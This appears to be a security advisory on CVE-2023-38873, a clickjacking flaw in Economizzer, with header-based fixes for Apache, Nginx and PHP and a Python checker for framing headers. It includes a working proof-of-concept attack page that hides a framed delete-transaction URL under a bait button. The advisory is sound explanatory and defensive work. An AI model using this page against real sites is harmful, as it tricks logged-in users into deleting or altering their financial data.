CVE-2023-38873 - Clickjacking Vulnerability in Economizzer (Commit 373088 and v.9-beta1)

Clickjacking, also called a "UI redress attack," is one of those web vulnerabilities that looks simple but can cost you dearly if left unchecked. CVE-2023-38873 affects Economizzer, the open-source personal finance manager: specifically commit 373088 (April 2023) and the v.9-beta1 release. Here is what developers, users, and sysadmins should know to stay safe.

What is Clickjacking?

Clickjacking is when an attacker tricks a user into clicking on something different from what they see. For example, you think you are clicking a harmless button or link, but in reality your click lands on a hidden element, perhaps a "delete account" or "transfer funds" button from another application, possibly one running on a different domain entirely.

How? The attacker places the real page inside an invisible or partially visible frame (<iframe>) and then puts some fake UI on top. When you think you’re clicking the safe element, your click actually goes to the dangerous, hidden button below. This is “hijacking” your intent.

Vulnerability Details

Economizzer’s web app, at commit 373088 (April 2023) and v.9-beta1, does not prevent its pages from being loaded inside a frame (<iframe>). This means any external site can embed Economizzer's pages and trick users into clicking on dangerous buttons (like Delete, Transfer, or Logout).

Suppose you have your Economizzer running at

https://your-economizzer.example.com/

An attacker can easily create a malicious page, like this

<!DOCTYPE html>
<html>
  <head>
    <title>Totally Innocent Site</title>
    <style>
      iframe {
        opacity: .01;  /* almost invisible */
        position: absolute;
        top: 0;
        left: 0;
        width: 800px;
        height: 600px;
        z-index: 2;
      }
      .bait {
        position: absolute;
        top: 190px;
        left: 370px;
        z-index: 1;
        background: #42a5f5;
        padding: 40px 90px;
        font-size: 30px;
        color: white;
        cursor: pointer;
        border-radius: 12px;
      }
    </style>
  </head>
  <body>
    <iframe src="https://your-economizzer.example.com/transactions/delete/123"></iframe>
    <div class="bait">Click Here for a Surprise!</div>
  </body>
</html>

If you’re logged in to your Economizzer, clicking the “Click Here for a Surprise!” button will actually execute the delete action on your Economizzer, not the fun action the attacker promised!

Why Is This Possible?

The root cause is that the application sends neither an X-Frame-Options header nor a Content-Security-Policy header with a frame-ancestors directive. When properly set, these headers stop third-party sites from loading your web app inside an <iframe>.

Economizzer (v.9-beta1 / 373088) – What You See in the Code

No line in the code or web server setup generates headers like

X-Frame-Options: SAMEORIGIN

or

Content-Security-Policy: frame-ancestors 'self'

So, pages are free to be embedded almost anywhere.

How to Fix

If you run Economizzer on the affected versions, add the security header yourself. This can be done in your web server configuration (Apache, Nginx, etc.) or in the PHP application code.

Apache: add this to your .htaccess or site config (mod_headers must be enabled)

Header set X-Frame-Options "SAMEORIGIN"

Nginx: add this to your server block

add_header X-Frame-Options "SAMEORIGIN";

PHP: at the top of your scripts, before any output is sent

header('X-Frame-Options: SAMEORIGIN');

Or use the stronger, modern approach, which current browsers apply in preference to X-Frame-Options when both headers are present

header("Content-Security-Policy: frame-ancestors 'self'");
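To verify that a deployment actually sends one of these headers, here is an added Python checker (example code, not part of Economizzer or this advisory) that reads a response head and decides whether browsers would block third-party framing. It goes slightly beyond the two headers above: a CSP frame-ancestors directive takes precedence over X-Frame-Options, the obsolete ALLOW-FROM value gives no protection, and a Report-Only policy enforces nothing. All sample response heads are constructed.

```python
"""Added example, not Economizzer code: does a response head block third-party framing?
Models browsers: CSP frame-ancestors overrides X-Frame-Options, ALLOW-FROM is obsolete."""
def parse_headers(raw: str) -> dict[str, list[str]]:
    """Parse a raw HTTP response head into {lowercased name: [values]}."""
    headers: dict[str, list[str]] = {}
    for line in raw.splitlines()[1:]:  # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers

def _frame_ancestors(csp_values: list[str]) -> list[list[str]]:
    """Source list of every frame-ancestors directive across all enforced CSP values."""
    lists = []
    for value in csp_values:
        for policy in value.split(","):  # several policies may be comma-joined
            for directive in policy.split(";"):
                parts = directive.split()
                if parts and parts[0].lower() == "frame-ancestors":
                    lists.append([p.lower() for p in parts[1:]])
    return lists

def framing_verdict(headers: dict[str, list[str]]) -> tuple[bool, str]:
    """Return (blocks_third_party_framing, reason); Report-Only headers are ignored."""
    policies = _frame_ancestors(headers.get("content-security-policy", []))
    if policies:  # frame-ancestors present: browsers ignore X-Frame-Options
        for sources in policies:  # every policy applies, so one strict list suffices
            if "*" not in sources and not any(s.endswith(":") for s in sources):
                return True, "CSP frame-ancestors " + " ".join(sources)
        return False, "CSP frame-ancestors allows any ancestor ('*' or bare scheme)"
    xfo = [p.strip().upper() for v in headers.get("x-frame-options", []) for p in v.split(",")]
    if not xfo:
        return False, "no framing header at all (the CVE-2023-38873 condition)"
    if all(v in ("DENY", "SAMEORIGIN") for v in xfo):
        return True, "X-Frame-Options " + xfo[0]
    return False, "X-Frame-Options not enforced by browsers: " + ", ".join(xfo)

# Constructed sample response heads, not captured from a real host
BASE = "HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=UTF-8\r\n"
SAMPLES = {
    "as shipped in v.9-beta1": BASE,
    "fixed with X-Frame-Options": BASE + "X-Frame-Options: SAMEORIGIN\r\n",
    "fixed with CSP": BASE + "Content-Security-Policy: default-src 'self'; frame-ancestors 'self'\r\n",
    "DENY overridden by permissive CSP": BASE + "X-Frame-Options: DENY\r\nContent-Security-Policy: frame-ancestors *\r\n",
    "report-only policy": BASE + "Content-Security-Policy-Report-Only: frame-ancestors 'none'\r\n",
}

if __name__ == "__main__":  # one verdict line per sample head
    for label, raw in SAMPLES.items():
        print(label, framing_verdict(parse_headers(raw)))
```

Only the two "fixed" heads come back as protected; the DENY-plus-permissive-CSP case shows why adding a CSP without a strict frame-ancestors list can silently undo an X-Frame-Options fix.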

References

- Economizzer - Commit 373088
- v.9-beta1 Release
- OWASP: Clickjacking
- MDN: X-Frame-Options
- MDN: Content-Security-Policy/frame-ancestors

Summary

CVE-2023-38873 exposes Economizzer users to clickjacking attacks. By loading the app in an invisible frame, attackers can trick users into clicking buttons or links that do things they never intended, including deleting or changing financial data. Until developers patch this, users and admins should set the right headers in their web servers. ALWAYS use X-Frame-Options or Content-Security-Policy! Stay safe, and don't get hijacked!


Timeline

Published on: 09/28/2023 04:15:12 UTC
Last modified on: 10/02/2023 20:48:21 UTC